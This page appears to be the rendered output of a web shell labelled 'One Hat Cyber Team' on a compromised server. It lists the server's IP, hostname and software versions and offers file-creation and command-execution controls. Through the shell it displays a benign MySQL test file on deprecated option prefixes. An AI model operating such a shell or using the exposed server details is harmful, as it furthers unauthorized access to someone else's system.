⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.124
Server IP:
50.28.103.30
Server:
Linux host.jcukjv-lwsites.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
Server Software:
nginx/1.28.0
PHP Version:
8.3.12
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
www
/
server
/
mysql
/
mysql-test
/
t
/
View File Name :
wl6978.test
# This test should work in embedded server after we fix mysqltest -- source include/not_embedded.inc --echo # --echo # WL#6951: Deprecate unique option prefixes --echo # --echo # Test unique option prefixes in client --echo # should fail due to wrong option --disable_result_log --error 7 --exec $MYSQL test --init-comman="CREATE TABLE wl6951(a int)" -e "SELECT 1 AS CMD" 2>&1 --enable_result_log --echo # table must not exist --error ER_NO_SUCH_TABLE SELECT * FROM wl6951;